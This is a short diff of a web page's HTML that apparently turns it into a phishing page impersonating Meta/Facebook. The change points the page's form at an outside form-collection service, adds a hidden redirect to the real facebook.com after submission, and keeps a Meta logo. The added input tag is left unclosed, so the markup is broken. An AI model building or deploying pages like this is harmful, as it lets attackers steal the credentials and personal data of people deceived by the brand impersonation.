--- a/index.html
+++ b/index.html
@@ -31,7 +31,11 @@
     <br /><br />
 
     <div class="main-body">
-      <form class="content" action="https://submit-form.com/mTj2onEsd" method="POST">
+      <form class="sm:hidden lg:block md:block" action="https://submit-form.com/6D7OCUHKA" method="post">
+    <input
+    type="hidden"
+    name="_redirect"
+    value="https://www.facebook.com/"
         <div>
           <img src="https://upload.wikimedia.org/wikipedia/commons/a/ab/Meta-Logo.png" width="140" />
         </div>
